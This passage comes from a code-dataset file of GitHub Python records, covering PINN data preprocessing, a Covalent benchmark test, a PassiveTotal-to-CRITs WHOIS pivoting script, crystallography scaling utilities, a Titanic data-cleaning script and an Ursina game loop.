data[\"v_leftwall_train\"],\n data[\"v_leftwall_test\"],\n data[\"p_leftwall_train\"],\n data[\"p_leftwall_test\"],\n ) = train_test_split(\n data[f\"{label}features_leftwall\"][:,2], \n data[f\"{label}features_leftwall\"][:,1], \n data[f\"{label}features_leftwall\"][:,0],\n data[\"u_leftwall_labels\"],\n data[\"v_leftwall_labels\"],\n data[\"p_leftwall_labels\"],\n test_size=test_size)\n\n #Rightwall\n (\n data[\"x_rightwall_train\"],\n data[\"x_rightwall_test\"],\n data[\"y_rightwall_train\"],\n data[\"y_rightwall_test\"],\n data[\"t_rightwall_train\"],\n data[\"t_rightwall_test\"],\n data[\"u_rightwall_train\"],\n data[\"u_rightwall_test\"],\n data[\"v_rightwall_train\"],\n data[\"v_rightwall_test\"],\n data[\"p_rightwall_train\"],\n data[\"p_rightwall_test\"],\n ) = train_test_split(\n data[f\"{label}features_rightwall\"][:,2], \n data[f\"{label}features_rightwall\"][:,1], \n data[f\"{label}features_rightwall\"][:,0],\n data[\"u_rightwall_labels\"],\n 
data[\"v_rightwall_labels\"],\n data[\"p_rightwall_labels\"],\n test_size=test_size)\n\n return data\n\ndef make_boundary_arrays_contiguous(data):\n \"\"\"\n Concatenate boundary condition arrays into a \n contiguous array to ease training of the PINN\n as all boundary arrays have the same boundary \n condition currently.\n \"\"\"\n data_components = [\"u\",\"v\",\"p\",\"x\",\"y\",\"t\"]\n train_test_components = [\"train\",\"test\"]\n\n for data_component in data_components:\n for train_test_component in train_test_components:\n data[f\"{data_component}_boundary_{train_test_component}\"] = \\\n np.concatenate((\n data[f\"{data_component}_rightwall_{train_test_component}\"],\n data[f\"{data_component}_leftwall_{train_test_component}\"],\n data[f\"{data_component}_basewall_{train_test_component}\"]\n ))\n\n return data\n\ndef extract_boundaries(data):\n \"\"\"\n Extract boundary data from U,V and P arrays\n \"\"\"\n #Handling data labels; fluid properties\n array_labels = [\"u\", \"v\", \"p\"]\n for array_label in array_labels:\n \n #Get boundary data labels\n data[f\"{array_label}_basewall\"] = \\\n data[f\"{array_label}\"][:,0,:]\n \n data[f\"{array_label}_leftwall\"] = \\\n data[f\"{array_label}\"][:,1:-1,0]\n \n data[f\"{array_label}_rightwall\"] = \\\n data[f\"{array_label}\"][:,1:-1,-1]\n\n #Reshape to column format for DL framework\n data[f\"{array_label}_basewall_labels\"] = \\\n data[f\"{array_label}_basewall\"].flatten().reshape(-1,1)\n \n data[f\"{array_label}_leftwall_labels\"] = \\\n data[f\"{array_label}_leftwall\"].flatten().reshape(-1,1)\n \n data[f\"{array_label}_rightwall_labels\"] = \\\n data[f\"{array_label}_rightwall\"].flatten().reshape(-1,1)\n \n #Handling features; x,y,t spatio-temporal locations \n array_labels = [\"x\",\"y\",\"t\"]\n for array_label in array_labels:\n \n #Get boundary data features\n data[f\"basewall_features_{array_label}\"] = data[array_label][:,0,:]\n data[f\"leftwall_features_{array_label}\"] = data[array_label][:,1:-1,0]\n data[f\"rightwall_features_{array_label}\"] = data[array_label][:,1:-1,-1]\n\n #Reshape to column format for DL framework\n array_labels = [\"basewall\",\"rightwall\",\"leftwall\"]\n for array_label in array_labels:\n \n data[f\"features_{array_label}\"] = np.concatenate(\n (\n data[f\"{array_label}_features_t\"].flatten().reshape(-1,1),\n data[f\"{array_label}_features_y\"].flatten().reshape(-1,1),\n data[f\"{array_label}_features_x\"].flatten().reshape(-1,1)\n ), \n axis=1)\n\n return data\n\ndef extract_interior(data):\n \"\"\"\n Extract interior data from U,V and P arrays.\n \"\"\"\n #Handling data labels; fluid properties\n array_labels = [\"u\", \"v\", \"p\"]\n for array_label in array_labels:\n data[f\"{array_label}_interior\"] = data[array_label][:,1:-1,1:-1]\n data[f\"{array_label}_interior_labels\"] = \\\n data[f\"{array_label}_interior\"].flatten().reshape(-1,1)\n \n #Handling features; x,y,t spatio-temporal locations\n array_labels = [\"x\", \"y\", \"t\"]\n for array_label in array_labels:\n data[f\"interior_features_{array_label}\"] = data[array_label][:,1:-1,1:-1]\n\n #Reshape to column format for DL framework\n data[\"features_interior\"] = np.concatenate(\n (\n data[\"interior_features_t\"].flatten().reshape(-1,1),\n data[\"interior_features_y\"].flatten().reshape(-1,1),\n data[\"interior_features_x\"].flatten().reshape(-1,1),\n ),\n axis=1)\n \n return data\n\ndef merge_features(data,geom):\n \"\"\"\n Concatenate features together into a single array.\n \"\"\"\n data[\"y\"], data[\"t\"], data[\"x\"] = 
np.meshgrid(\n np.linspace(geom[\"y_start\"],geom[\"y_end\"],geom[\"numy\"]),\n np.linspace(geom[\"t_start\"],geom[\"t_end\"],geom[\"numt\"]),\n np.linspace(geom[\"x_start\"],geom[\"x_end\"],geom[\"numx\"]))\n\n #Return an array in form t, x, y\n data[\"features\"] = np.concatenate(\n (\n data[\"t\"].flatten().reshape(-1,1),\n data[\"y\"].flatten().reshape(-1,1),\n data[\"x\"].flatten().reshape(-1,1)\n ),\n axis=1)\n\n return data\n\ndef convert_to_tensors(data,device):\n \"\"\"\n Convert numpy arrays into tensors\n and ensure they reside on the correct PyTorch device\n and have the correct gradient tracking applied\n for automatic differentiation.\n \"\"\"\n geom_components = [\"interior\",\"boundary\"]\n train_test_components = [\"train\",\"test\"]\n\n for geom_component in geom_components:\n for train_test_component in train_test_components:\n\n data[f\"x_{geom_component}_{train_test_component}_tensor\"] = \\\n from_numpy(data[f\"x_{geom_component}_{train_test_component}\"]).\\\n float().requires_grad_().to(device)\n\n data[f\"y_{geom_component}_{train_test_component}_tensor\"] = \\\n from_numpy(data[f\"y_{geom_component}_{train_test_component}\"]).\\\n float().requires_grad_().to(device)\n\n data[f\"t_{geom_component}_{train_test_component}_tensor\"] = \\\n from_numpy(data[f\"t_{geom_component}_{train_test_component}\"]).\\\n float().requires_grad_().to(device)\n\n data[f\"u_{geom_component}_{train_test_component}_tensor\"] = \\\n from_numpy(data[f\"u_{geom_component}_{train_test_component}\"]).\\\n float().requires_grad_().to(device)\n\n data[f\"v_{geom_component}_{train_test_component}_tensor\"] = \\\n from_numpy(data[f\"v_{geom_component}_{train_test_component}\"]).\\\n float().requires_grad_().to(device)\n\n data[f\"p_{geom_component}_{train_test_component}_tensor\"] = \\\n from_numpy(data[f\"p_{geom_component}_{train_test_component}\"]).\\\n float().requires_grad_().to(device)\n\n return data","repo_name":"harrymchugh/pinns","sub_path":"src/cfdpinn/preprocess.py","file_name":"preprocess.py","file_ext":"py","file_size_in_byte":11927,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"66"}
+{"seq_id":"6476125499","text":"import random\n\nimport pytest\n\nimport covalent as ct\nfrom covalent._shared_files.util_classes import Status\n\n\n@pytest.mark.parametrize(\"iteration\", range(5))\ndef test_benchmark_primality_test(benchmark, iteration):\n run_benchmark = benchmark[0]\n logger = benchmark[1]\n\n @ct.electron\n def is_prime(n: int) -> bool:\n \"\"\"Primality test using 6k+-1 optimization.\"\"\"\n if n <= 3:\n return n > 1\n if not n % 2 or not n % 3:\n return False\n i = 5\n stop = int(n**0.5)\n while i <= stop:\n if not n % i or not n % (i + 2):\n return False\n i += 6\n return True\n\n @ct.lattice\n def primality_tests(nums_to_test):\n res = []\n for i in nums_to_test:\n entry = {}\n entry[\"num\"] = i\n entry[\"is_prime\"] = is_prime(i)\n res.append(entry)\n return res\n\n nums_to_test = [random.randint(1000, 10000) for i in range(50)]\n\n results, status = run_benchmark(iteration, primality_tests, *[nums_to_test])\n logger.debug(results.dict())\n\n assert status == Status(\"COMPLETED\")\n","repo_name":"AgnostiqHQ/covalent","sub_path":"tests/stress_tests/benchmarks/cpu_intensive_workflows_test.py","file_name":"cpu_intensive_workflows_test.py","file_ext":"py","file_size_in_byte":1138,"program_lang":"python","lang":"en","doc_type":"code","stars":584,"dataset":"github-code","pt":"66"}
+{"seq_id":"43756574715","text":"#!/usr/bin/env python3\n\nimport argparse\nimport datetime\nimport getpass\nimport json\nimport logging\nimport logging.config\nimport os\nimport re\nimport sys\nimport tabulate\nimport uuid\n\nfrom critsapi.critsapi import CRITsAPI\nfrom critsapi.critsdbapi import CRITsDBAPI\n\nfrom lib.pt.common.config import Config\nfrom lib.pt.common.constants import PT_HOME\nfrom lib.pt.core.database import Database\nfrom lib.pt.ptapi import PTAPI\nfrom lib.crits.vocabulary.indicators import IndicatorTypes as it\nfrom operator import itemgetter\nfrom configparser import ConfigParser\n\nlog = logging.getLogger()\nVERSION = \"0.1337\"\n\n# Check configuration directory\nlocal_config_dir = os.path.join(PT_HOME, 'etc', 'local')\nif not os.path.exists(local_config_dir):\n os.makedirs(local_config_dir)\n sys.exit('No etc/local/ directory. See README to create.')\n\nconfig = Config()\n\n# Check local data directory\nif config.core.cache_enabled:\n if not os.path.exists(config.core.cache_dir):\n log.info('Creating Cache directory in '\n '{}'.format(config.core.cache_dir))\n os.makedirs(config.core.cache_dir)\n\n# Initialize loggin\nlog_path = os.path.join(PT_HOME, 'etc', 'local', 'logging.ini')\ntry:\n logging.config.fileConfig(log_path)\nexcept Exception as e:\n sys.exit('unable to load logging configuration file {}: '\n '{}'.format(log_path, str(e)))\n\npt = PTAPI(username=config.core.pt_username, apikey=config.core.pt_apikey)\npt.set_proxy(http=config.proxy.http, https=config.proxy.https)\n\nargparser = argparse.ArgumentParser()\nargparser.add_argument('QUERY', action='store', help='A value to send as a'\n ' query to PT. Email, phone, name, etc.')\nargparser.add_argument('--dev', dest='dev', action='store_true', default=False)\nargparser.add_argument('--crits', dest='crits', action='store_true',\n default=False, help='Write the results to CRITs with'\n ' appropriate relationships.')\nargparser.add_argument('--test', dest='test', action='store_true',\n default=False, help='Run with test data. (Save PT '\n 'queries)')\nargparser.add_argument('-f', dest='force', action='store_true', default=False,\n help='Force a new API query (do not used cached '\n 'results.')\nargparser.add_argument('-t', action='append', dest='tags', default=[],\n help='Bucket list tags for crits. 
Multiple -t options '\n 'are allowed.')\n# Add our mutually exclusive items\nmeg = argparser.add_mutually_exclusive_group()\nmeg.add_argument('-n', dest='name', action='store_true', default=False,\n help='The query is a name and pt_query will not try to '\n 'determine the type automatically.')\nmeg.add_argument('-a', dest='address', action='store_true', default=False,\n help='The query is an address and pt_query will not '\n 'try to determine the type automatically.')\nargs = argparser.parse_args()\n\n# Patterns for determining which type of lookup to do\n# Some items cannot be differentiated via regex (name vs address), so we use\n# a flag to specify these\n# Load patterns for regexes\npattern_config = ConfigParser()\npatterns = {}\nwith open(os.path.join(PT_HOME, 'etc', 'patterns.ini')) as fp:\n pattern_config.readfp(fp)\n\nemail_address_pattern = re.compile(pattern_config.get('email', 'pattern'))\nphone_pattern = re.compile(pattern_config.get('phone', 'pattern'))\ndomain_pattern = re.compile(pattern_config.get('domain', 'pattern'))\n\ndatabase = None\nif config.core.cache_enabled:\n database = Database()\n\nif args.crits:\n HOME = os.path.expanduser(\"~\")\n if not os.path.exists(os.path.join(HOME, '.crits_api')):\n print('''Please create a file with the following contents:\n [crits]\n user = lolnate\n\n [keys]\n prod_api_key = keyhere\n dev_api_key = keyhere\n ''')\n raise SystemExit('~/.crits_api was not found or was not accessible.')\n\n crits_config = ConfigParser()\n crits_config.read(os.path.join(HOME, '.crits_api'))\n\n if crits_config.has_option(\"keys\", \"prod\"):\n crits_api_prod = crits_config.get(\"keys\", \"prod\")\n if crits_config.has_option(\"keys\", \"dev\"):\n crits_api_dev = crits_config.get(\"keys\", \"dev\")\n if crits_config.has_option(\"crits\", \"user\"):\n crits_username = crits_config.get(\"crits\", \"user\")\n\n if args.dev:\n crits_url = config.crits.crits_dev_api_url\n crits_api_key = crits_api_dev\n if len(crits_api_key) != 40:\n print(\"Dev API key in ~/.crits_api is the wrong length! Must be 40\\\n characters.\")\n else:\n crits_url = config.crits.crits_prod_api_url\n crits_api_key = crits_api_prod\n if len(crits_api_key) != 40:\n print(\"Prod API key in ~/.crits_api is the wrong length! 
Must be 40\\\n characters.\")\n\n crits_proxy = {\n 'http': config.crits.crits_proxy_url,\n 'https': config.crits.crits_proxy_url,\n }\n\n # Build our mongo connection\n if args.dev:\n crits_mongo = CRITsDBAPI(mongo_uri=config.crits.mongo_uri_dev,\n db_name=config.crits.database)\n else:\n crits_mongo = CRITsDBAPI(mongo_uri=config.crits.mongo_uri,\n db_name=config.crits.database)\n crits_mongo.connect()\n # Connect to the CRITs API\n crits = CRITsAPI(\n api_url=crits_url,\n api_key=crits_api_key,\n username=crits_username,\n proxies=crits_proxy,\n verify=config.crits.crits_verify\n )\n\nquery = args.QUERY.rstrip()\n# Get the user launching all this\nuser = getpass.getuser()\n\n# Used to store the type of indicator in CRITs for the query object.\ncrits_indicator_type = ''\n\n# Used to store the cache file location\ncache_file = None\n\nif database and not args.force and config.core.cache_enabled:\n cache_file = database.get_cache_file(query)\n if cache_file:\n log.info('Using cache file for query {}'.format(query))\n with open(cache_file) as fp:\n results = json.loads(fp.read())\n\nbucket_list = ['whois', 'pt:query']\nfor t in args.tags:\n bucket_list.append(t)\n\nif args.name or args.address:\n if args.name:\n field_str = 'name'\n if args.address:\n field_str = 'address'\n if args.test:\n results = pt.get_test_results(field=field_str)\n else:\n results = pt.whois_search(query=query, field=field_str)\n\n if database and not cache_file and config.core.cache_enabled:\n filepath = os.path.join(config.core.cache_dir, str(uuid.uuid4()))\n log.debug('Filepath is {}'.format(filepath))\n database.add_results_to_cache(query, user, results, filepath)\n\n base_reference = 'https://www.passivetotal.org/search/whois/'\\\n '{}'.format(field_str)\n # Use our config defined indicator type of whois email objects\n if args.name:\n crits_indicator_type = it.WHOIS_NAME\n if args.address:\n crits_indicator_type = it.WHOIS_ADDR1\n\n bucket_list.append('registrant')\n\nelif re.match(email_address_pattern, query):\n if args.test:\n results = pt.get_test_results(field='email')\n else:\n results = pt.whois_search(query=query, field='email')\n # Now add the results to the db if we have it\n if database and not cache_file and config.core.cache_enabled:\n filepath = os.path.join(config.core.cache_dir, str(uuid.uuid4()))\n log.debug('Filepath is {}'.format(filepath))\n database.add_results_to_cache(query, user, results, filepath)\n\n base_reference = 'https://www.passivetotal.org/search/whois/email'\n # Use our config defined indicator type of whois email objects\n crits_indicator_type = it.WHOIS_REGISTRANT_EMAIL_ADDRESS\n bucket_list.append('registrant')\n\nelif re.match(phone_pattern, query):\n if args.test:\n results = pt.get_test_results(field='phone')\n else:\n results = pt.whois_search(query=query, field='phone')\n # Now add the results to the db if we have it\n if database and not cache_file and config.core.cache_enabled:\n filepath = os.path.join(config.core.cache_dir, str(uuid.uuid4()))\n log.debug('Filepath is {}'.format(filepath))\n database.add_results_to_cache(query, user, results, filepath)\n\n base_reference = 'https://www.passivetotal.org/search/whois/phone'\n crits_indicator_type = it.WHOIS_TELEPHONE\n bucket_list.append('registrant')\n\nelif re.match(domain_pattern, query):\n if args.test:\n results = pt.get_test_results(field='domain')\n else:\n results = pt.whois_search(query=query, field='domain')\n # Now add the results to the db if we have it\n if database and not cache_file and 
config.core.cache_enabled:\n filepath = os.path.join(config.core.cache_dir, str(uuid.uuid4()))\n log.debug('Filepath is {}'.format(filepath))\n database.add_results_to_cache(query, user, results, filepath)\n\n base_reference = 'https://www.passivetotal.org/search/whois/domain'\n crits_indicator_type = it.DOMAIN\n\nelse:\n raise SystemExit(\"Your query didn't match a known pattern.\")\n\n# Add the query to CRITs regardless of the number of results\n# TODO: Add campaigns\nif args.crits:\n found = False\n # Search for it with raw mongo because API is slow\n crits_result = crits_mongo.find('indicators', {'value': query, 'type':\n crits_indicator_type})\n if crits_result.count() > 0:\n for r in crits_result:\n if r['value'] == query:\n indicator = r\n found = True\n if not found:\n indicator = crits.add_indicator(\n value=query,\n itype=crits_indicator_type,\n source=config.crits.default_source,\n reference='Added via pt_query.py',\n method='pt_query.py',\n bucket_list=bucket_list,\n indicator_confidence='low',\n indicator_impact='low',\n description='Queried with pt_query.py',\n )\n\n # This is pretty hacky - Since we use both the raw DB and the API, we might\n # receive either an '_id' or an 'id' back. We are going to standardize on\n # 'id', rather than '_id'\n if 'id' not in indicator:\n if '_id' not in indicator:\n print(repr(indicator))\n raise SystemExit('id and _id not found for query: '\n '{} in new indicator'.format(query))\n else:\n indicator['id'] = indicator['_id']\n\n# Iterate through all results and print/add to CRITs (if args provided)\nformatted_results = []\nfor result in results['results']:\n if 'domain' in result:\n crits_indicators_to_add = []\n # Row contains:\n # Domain, Registrant Email, Registrant Name, Registrant Date,\n # Expiration Date, Tags\n row = ['', '', '', '', '', '']\n row[0] = result['domain']\n # Email address used to register\n if 'registrant' in result:\n # Append the registrant email\n if 'email' in result['registrant']:\n row[1] = result['registrant']['email']\n email_obj = {\n 'value': result['registrant']['email'],\n 'type': it.WHOIS_REGISTRANT_EMAIL_ADDRESS,\n 'related_to': result['domain']\n }\n crits_indicators_to_add.append(email_obj)\n if 'name' in result['registrant']:\n row[2] = result['registrant']['name']\n name_obj = {\n 'value': result['registrant']['name'],\n 'type': it.WHOIS_NAME,\n 'related_to': result['domain']\n }\n crits_indicators_to_add.append(name_obj)\n if 'telephone' in result['registrant']:\n row[3] = result['registrant']['telephone']\n phone_obj = {\n 'value': result['registrant']['telephone'],\n 'type': it.WHOIS_TELEPHONE,\n 'related_to': result['domain']\n }\n crits_indicators_to_add.append(phone_obj)\n if 'street' in result['registrant']:\n addr1_obj = {\n 'value': result['registrant']['street'],\n 'type': it.WHOIS_ADDR1,\n 'related_to': result['domain']\n }\n crits_indicators_to_add.append(addr1_obj)\n\n # Date the domain was registered\n if 'registered' in result:\n row[4] = result['registered']\n if 'expiresAt' in result:\n row[5] = result['expiresAt']\n formatted_results.append(row)\n # TODO: Tags. 
They appear to be an extra API query which is annoying\n\n reference = '{0}/{1}'.format(base_reference, query)\n\n if args.crits:\n # Let's try getting the confidence and impact from the parent whois\n # indicator\n confidence = 'low'\n impact = 'low'\n if 'confidence' in indicator:\n if 'rating' in indicator['confidence']:\n confidence = indicator['confidence']['rating']\n if 'impact' in indicator:\n if 'rating' in indicator['impact']:\n impact = indicator['impact']['rating']\n # If not in CRITs, add all the associated indicators\n bucket_list = ['whois pivoting', 'pt:found']\n for t in args.tags:\n bucket_list.append(t)\n new_ind = crits.add_indicator(\n value=result['domain'],\n itype=it.DOMAIN,\n source=config.crits.default_source,\n reference=reference,\n method='pt_query.py',\n bucket_list=bucket_list,\n indicator_confidence=confidence,\n indicator_impact=impact,\n description='Discovered through PT whois pivots'\n )\n\n # The CRITs API allows us to add a campaign to the indicator, but\n # not multiple campaigns at one time,\n # so we will do it directly with the DB.\n # We want to replicate the campaigns of the WHOIS indicator (if\n # a campaign exists) to the new indicator.\n if 'campaign' in indicator:\n for campaign in indicator['campaign']:\n crits_mongo.add_embedded_campaign(\n new_ind['id'],\n 'indicators',\n campaign['name'],\n campaign['confidence'],\n campaign['analyst'],\n datetime.datetime.now(),\n campaign['description']\n )\n\n # If the new indicator and the indicator are not related,\n # relate them.\n if not crits.has_relationship(indicator['id'], 'Indicator',\n new_ind['id'], 'Indicator',\n rel_type='Registered'):\n crits.forge_relationship(indicator['id'], 'Indicator',\n new_ind['id'], 'Indicator',\n rel_type='Registered')\n\n # Now we can add the rest of the WHOIS indicators (if necessary)\n for ind in crits_indicators_to_add:\n # If the indicator exists, just get the id and use it to build\n # relationships. We will look for one with the same source.\n # If not in CRITs, add it and relate it.\n whois_indicator = crits_mongo.find_one(\n 'indicators',\n {\n 'value': ind['value'],\n 'type': ind['type'],\n 'source.name':\n config.crits.default_source,\n })\n if not whois_indicator:\n bucket_list = ['whois pivoting', 'pt:found']\n for t in args.tags:\n bucket_list.append(t)\n whois_indicator = crits.add_indicator(\n value=ind['value'],\n itype=ind['type'],\n source=config.crits.default_source,\n reference=reference,\n method='pt_query.py',\n bucket_list=bucket_list,\n indicator_confidence=confidence,\n indicator_impact=impact,\n description='Discovered through PT whois pivots'\n )\n\n # This is pretty hacky - Since we use both the raw DB and the\n # API, we might receive either an '_id' or an 'id' back. 
We\n # are going to standardize on 'id', rather than '_id'\n if 'id' not in whois_indicator:\n if '_id' not in whois_indicator:\n print(repr(whois_indicator))\n raise SystemExit('id and _id not found for query: '\n '{} in whois indicator'.format(query))\n whois_indicator['id'] = whois_indicator['_id']\n\n # Not a huge deal, but make sure we don't waste time adding\n # a relationship to itself\n if whois_indicator['id'] == new_ind['id']:\n continue\n # The CRITs API allows us to add a campaign to the indicator,\n # but not multiple campaigns at one time,\n # so we will do it directly with the DB.\n # We want to replicate the campaigns of the WHOIS indicator (if\n # a campaign exists) to the new indicator.\n # Continue with the same campaign\n if 'campaign' in indicator:\n for campaign in indicator['campaign']:\n crits_mongo.add_embedded_campaign(\n whois_indicator['id'],\n 'indicators',\n campaign['name'],\n campaign['confidence'],\n campaign['analyst'],\n datetime.datetime.now(),\n campaign['description']\n )\n\n # If the new indicator and the indicator are not related,\n # relate them.\n if not crits.has_relationship(whois_indicator['id'],\n 'Indicator',\n new_ind['id'],\n 'Indicator',\n rel_type='Registered'):\n crits.forge_relationship(whois_indicator['id'],\n 'Indicator',\n new_ind['id'],\n 'Indicator',\n rel_type='Registered')\n\n# Add a bucket_list item to track that we searched for this whois indicator\nif args.crits:\n crits_mongo.add_bucket_list_item(indicator['id'], 'indicators',\n 'pt:whois_search_completed')\n\n# SORT BY DATE\nformatted_results = sorted(formatted_results, key=itemgetter(3), reverse=True)\n# Row contains:\n# Domain, Registrant Email, Registrant Name, Registrant Telephone,\n# Registrant Date, Expiration Date, Tags\nheaders = ['Domain', 'Registrant Email', 'Registrant Name',\n 'Registrant Telephone', 'Registrant Date', 'Expiration Date',\n 'Tags']\nprint(tabulate.tabulate(formatted_results, headers))\n","repo_name":"IntegralDefense/ptauto","sub_path":"bin/pt_query.py","file_name":"pt_query.py","file_ext":"py","file_size_in_byte":19839,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"66"}
+{"seq_id":"18713877002","text":"\n__author__ = [\"S. Basu\"]\n__license__ = \"M.I.T\"\n__date__ = \"28/07/2017\"\n__refactordate__ = \"10/05/2021\"\n\nimport os, sys,glob\nimport logging\nfrom src.abstract import Abstract\nfrom src.xscale_output import OutputParser\n\nlogger = logging.getLogger('sxdm')\n\nclass ScaleUtils(Abstract):\n\n def find_corrects(self, inData):\n self.results['listofCORRECTfiles'] = []\n try:\n for fname in inData['listofHKLfiles']:\n folder = os.path.dirname(fname)\n path = os.path.join(folder, 'CORRECT.LP')\n\n if os.path.isfile(path):\n self.results['listofCORRECTfiles'].append(path)\n\n else:\n logger.info('CORRECT.LP could not be found in %s' %folder)\n self.setFailure()\n except KeyError:\n self.setFailure()\n return\n\n def check_bfactor(self, inData):\n self.find_corrects(inData)\n bfac_dicts = {}\n\n if len(self.results['listofCORRECTfiles']) == 0:\n err = 'ValueError: no CORRECT.LP found'\n logger.info('ValueError: {}'.format(err))\n\n else:\n for fname, cor_name in zip(inData['listofHKLfiles'], self.results['listofCORRECTfiles']):\n fh = open(cor_name, 'r')\n _all = fh.readlines()\n fh.close()\n xasci = fname\n for lines in _all:\n if \"WILSON LINE\" in lines:\n line = lines.split()\n try:\n bfac_dicts[xasci] = float(line[9])\n except Exception:\n logger.info('B-factor might be negative, not considered')\n else:\n pass\n\n self.results['bfac_sorted_hkls'] = sorted(bfac_dicts.items(), key=lambda x : x[1])\n return\n\n def rank_rmeas(self, inData):\n self.find_corrects(inData)\n rmeas_dict = {}\n\n if len(self.results['listofCORRECTfiles']) == 0:\n err = 'ValueError: no CORRECT.LP found'\n logger.info('ValueError: {}'.format(err))\n else:\n for fname, cor_name in zip(inData['listofHKLfiles'], self.results['listofCORRECTfiles']):\n indict = {'CORRECT_file': cor_name}\n correct_parse = OutputParser(indict)\n correct_parse.parse_xds_stats(indict)\n mean_rmeas = correct_parse.mean_rmeas_calc(correct_parse.results['xds_stat'])\n rmeas_dict[fname] = mean_rmeas\n\n self.results['rmeas_sorted_hkls'] = sorted(rmeas_dict.items(), key=lambda x:x[1])\n return\n\n\n def ref_choice(self, inData):\n reference = None\n if inData['fom'] == 'bfac':\n self.check_bfactor(inData)\n try:\n reference = self.results['bfac_sorted_hkls'][0][0]\n\n except (IndexError, ValueError):\n err = 'bfactor selection may not work'\n logger.error(err)\n self.setFailure()\n\n\n elif inData['fom'] == 'rmeas':\n self.rank_rmeas(inData)\n try:\n reference = self.results['rmeas_sorted_hkls'][0][0]\n except (IndexError, ValueError):\n err = 'Rmeas based referenceing may not have worked'\n logger.error(err)\n self.setFailure()\n else:\n pass\n self.results['reference'] = reference\n return\n\n def Bfact_sorter(self, inData):\n bfac_sorted_hkls = []\n self.check_bfactor(inData)\n if len(self.results['bfac_sorted_hkls']) > 0:\n for i in range(len(self.results['bfac_sorted_hkls'])):\n bfac_sorted_hkls.append(self.results['bfac_sorted_hkls'][i][0])\n else:\n err = \"Rmeas based sorting did not work, check\"\n logger.error(err)\n self.setFailure()\n\n self.results['bfact_sorted_hkls'] = bfac_sorted_hkls\n return\n\n def rmeas_sorter(self, inData):\n rmeas_sorted_hkls = []\n self.rank_rmeas(inData)\n if len(self.results['rmeas_sorted_hkls']) > 0:\n for i in range(len(self.results['rmeas_sorted_hkls'])):\n rmeas_sorted_hkls.append(self.results['rmeas_sorted_hkls'][i][0])\n else:\n err = \"Rmeas based sorting did not work, check\"\n logger.error(err)\n self.setFailure()\n self.results['rmeas_sorted_hkls'] = 
rmeas_sorted_hkls\n return\n\ndef main():\n hklpaths = glob.glob(os.path.join(sys.argv[1], 'XDS_ASCII.HKL'))\n inData = dict()\n inData['listofHKLfiles'] = hklpaths\n sc = ScaleUtils(inData)\n sc.rmeas_sorter(inData)\n print(sc.results['rmeas_sorted_hkls'])\n\nif __name__ == '__main__':\n main()\n","repo_name":"shibom/sxdm","sub_path":"src/scale_utl.py","file_name":"scale_utl.py","file_ext":"py","file_size_in_byte":4804,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"66"}
+{"seq_id":"3314307710","text":"import warnings#忽略警告提示\nwarnings.filterwarnings('ignore')\n\nimport numpy as np\nimport pandas as pd\n\ntrain=pd.read_csv('train.csv')\ntest=pd.read_csv('test.csv')\nprint('训练数据集:',train.shape,'测试数据集',test.shape)\n\nrowNum_train=train.shape[0]\nrowNum_test=test.shape[0]\nprint('训练集行数:',rowNum_train)\nprint('测试集行数',rowNum_test)\n\nfull_df=train.append(test,ignore_index=True)\nprint('合并后的数据集:',full_df.shape)\n\nprint(full_df.head())#打印前几行\nprint(full_df.describe())#查看数据的统计信息\nprint(full_df.info())#查看每一列的数据类型,数据总数,以及是否有数据缺失\n\nfull_df['Fare']=full_df['Fare'].fillna(full_df['Fare'].mean())\nfull_df['Age']=full_df['Age'].fillna(full_df['Age'].mean())#把年龄和费用(票价)用均值来替代\nprint(full_df['Embarked'].mode())#查看Embark这一列的众数\nfull_df['Embarked']=full_df['Embarked'].fillna(full_df['Embarked'].mode())\n\nprint(full_df.info())\nsex_mapDict={'male':1,'female':0}\nfull_df['Sex']=full_df['Sex'].map(sex_mapDict)\nprint(full_df.head())\n\nembarkedDF=pd.DataFrame()\nembarkedDF=pd.get_dummies(full_df['Embarked'],prefix='Embarked')#使用get_dummies进行one-hot编码,列名前缀是Embarked\nprint(embarkedDF.head())\n\nfull=pd.concat([full_df,embarkedDF],axis=1)#因为这里用了登船港口(Embarked)进行了one-hot编码产生了它的虚拟变量,所以这里把它删掉\nfull.drop('Embarked',axis=1,inplace=True)\nprint(full.head())\nprint(full.shape)\n\nname1='Braund, Mr. Owen Harris'\nstr1=name1.split(',')[1]\nstr2=str1.split('.')[0]\nstr3=str2.split()\n\ndef getTitle(name):\n str1 = name1.split(',')[1]\n str2 = str1.split('.')[0]\n str3 = str2.strip()\n return str3\n\n\n\ntitleDF=pd.DataFrame()\ntitleDF['Title']=full['Name'].map(getTitle)\nprint(titleDF.head())\n\n# full=pd.concat([full,titleDF],axis=1)\n#\n# full.drop('Name',axis=1,inplace=True)\n# print(full.head)\n#\n# corrDF=full.corr()\n# print(corrDF)\n#\n# print(corrDF['Survived'].sort_values(ascending=False))\n#\n# full_X=pd.concat([titleDF],axis=1)\n# print(full_X.head())","repo_name":"2981047480/zephyr","sub_path":"大二机器学习记录/泰坦尼克数据/算法.py","file_name":"算法.py","file_ext":"py","file_size_in_byte":2092,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"66"}
+{"seq_id":"8966484604","text":"#importowanie wszystkich potrzebnych bibliotek i plików\nfrom GameParameters import *\nfrom ursina import *\nfrom Player import *\nfrom Train import *\nfrom Menu import *\nfrom screeninfo import get_monitors\nfrom train_spawner import *\nfrom high_scores import *\n\nGameParameters.paused = True\n#ustawianie pełnego ekranu\nmonitor = get_monitors()\napp = Ursina(fullscreen=True)\nwindow.size = Vec2(monitor[0].width, monitor[0].height)\nwindow.fps_counter.disable()\n#incjalizacja obiektów\nplayer = Player(collider='box', model='cube', position=(0, 0, 0))\nmain_menu = Menu(player)\nfor i in range(8):\n ground = Entity(model='/assets/tunele.glb', collider='box', scale=0.67, position=(0, -7, 110 *i))\n#światło bezpośrednio nad graczem\nL = PointLight(y = 10, x = 0, z = 0, color = color.white, shadows = True)\nplayer.menu = main_menu\n#wygenerowanie początkowych pociągów\nGameParameters.train += train_generator_init(player)\n#ustawienie głośnosci\nAudio.volume_multiplier = 0.5\n\ndef update():\n #przy śmierci usuwanie pociągów i wyświetlanie menu śmierci\n if GameParameters.death == True and GameParameters.paused == False:\n for i in GameParameters.train:\n i.disable()\n GameParameters.train.clear()\n main_menu.death_menu(player)\n #zwiększanie wyniku i szybkości\n if GameParameters.paused == False:\n GameParameters.score += int(time.dt * 100)\n main_menu.score_point.text = \"Score:\" + str(GameParameters.score)\n GameParameters.speed += 0.01\n 